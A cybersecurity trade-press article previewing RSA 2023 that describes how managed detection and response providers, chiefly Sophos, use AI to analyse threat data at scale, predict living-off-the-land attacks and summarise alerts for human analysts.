Ransomware

RSA Preview: How MDR uses AI for good

In what is very bad news for cybercriminals, providers of managed detection and response (MDR) are going big on AI. 

The technology, which is expected to frame much of the discussion at RSA 2023 next week, is now being trained to improve MDR threat hunting operations, threat pattern recognition, and the ability to predict attacks long before adversaries even recognize the opportunity. 

It comes at a time when more organizations are enlisting the aid of a MDR provider to fight ransomware and shore up vulnerabilities in their own security operation centers. MDR providers are highly sought after because they provide companies with access to seasoned threat hunters, advanced security products, and extensive threat intelligence collected on a global scale. With many organizations unable to cultivate these capabilities in-house, MDR stands out as an attractive alternative.

Now, the addition of AI adds even more incentive for companies to ally with a MDR provider. Here’s just a few of the ways that MDR providers are using their AI powers for good. 

AI solves data challenges at scale

Most organizations only have visibility over their own threat environment (and some even have trouble with that). But because MDR providers have a global clientele, they get significantly greater visibility of real-time security incidents that emerge on a daily basis. What this results in is a massive set of threat data that is tailor-made for AI to handle. 

“The big benefit to MDR is on the AI side of things,” says Andrew Mundell, Principal Sales Engineer at Sophos. “MDR providers will have more real world data, they are going to see more data, and they're going to be able to train their own AI models against a much larger data set than any other organization could.”

Where humans are great at looking at bite-sized packets of data to determine what happened – or what needs to happen next – they’re no match for the sheer computing power that AI brings to the table, which is capable of analyzing tremendous amounts of data in minutes or even seconds.

“We've been facing these large data challenges in security for a long time,” says Chester Wisniewski, Field CTO of Applied Research at Sophos. 

“When we're even just talking about malicious files that we analyze in the lab, well over half a million of them come in every day. Let’s be real: how many of those does a human ever really look at? But we really need a computer to tell us which ones to look at because there's gold in there.”

AI threat forecasts help steer MDR hunts

MDR threat hunters can also use AI’s predictive power to guide their hunts. The more training data that an AI has to process, the greater its ability to anticipate where an organization is in greatest danger of getting hit. 

Threat hunters can use this to their advantage, using AI-generated outputs as ‘leads’ to refine their hunt methods and hone in on would-be attackers. Mundell says the predictive component has even helped Sophos disrupt ‘living off the land’ attacks, which are some of the most difficult to detect because they use an organization’s own legitimate tools to install backdoors for infiltrating.

“You give AI a really good dataset, and what it can do is go and make predictions about what is going to come out of that data set. We’ve previously used that in Sophos products for portable executables for stopping stuff that we predict is going to be bad when it executes, but we're now using it to predict ‘living off the land’ activity and commands like that.”

That doesn’t mean AI is doing the job of the threat hunter, or that threat hunters are in danger of being replaced. For all their powerful predicting power, AI lacks the intuition and creativity that hunters use to hypothesize and draw connections between disparate data points. 

But when used as a navigational aid, AI is unmatched in this respect. 

“That is AI’s special sauce,” says Wisniewski. “It can digest this huge amount of information somewhat accurately, and point our humans in the right direction so they can take extremely fast action against emerging threats.”

AI improves MDR efficiency

Even organizations that have a functional, well-staffed SOC will struggle to detect, investigate and remediate threats as fast as possible. A recent survey conducted by Forrester, for example, found that security teams spend up to 600 hours per month investigating and remediating threats, which is roughly equivalent to the full-time workloads of four employees.  

But with AI at their disposal, MDR providers can respond and resolve threats in under an hour. Rather than having the analyst sort through a cluster of data containing ten different alerts, the AI can process that data itself and produce a summary of it that gives the analyst the necessary context to understand the situation and immediately take action. 

“One of the most important things is getting an alert into the hands of the human being as quickly as possible,” says Mundell. “So when it comes to generative AI, being able to surface all those predictions and then generate a 50 to 100 word summary for the analyst right out of the gate, that context is going to increase the efficiency of the analyst and therefore increase the efficiency of the service.”

But what if the AI is inaccurate? Could that jeopardize the findings? Wisniewski isn’t really concerned. He sees AI as an assistive play, like an alley-oop in basketball. If the AI’s job is to get the ball above the net, and the threat hunter’s job is to bring it home with a slam dunk.

“There's a million articles out there about people fooling ChatGPT or getting it to hallucinate (or as my mother calls it, lying). But when you're using AI the right way, it's kind of okay that that might occur.

“When we look at things like an MDR situation, what we're trying to do is get a machine to look at a whole bunch of data and tell us where the anomalies are in that data so that the humans can go look at the interesting bits. The humans can't possibly digest all the things that we're seeing come in, but the machine can. And it’s really good at that.”

To learn more about how MDR services are incorporating AI in their offerings, be sure to tune into RSA 2023 where generative AI is expected to be a headline discussion topic.

Daniel Thomas

Daniel Thomas is a technology writer, researcher, and content producer for CyberRisk Alliance. He has over a decade of experience writing on the most critical topics of interest for the cybersecurity community, including cloud computing, artificial intelligence and machine learning, data analytics, threat hunting, automation, IAM, and digital security policies. He previously served as a senior editor for Defense News, and as the director of research for GovExec News in Washington, D.C.. 

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.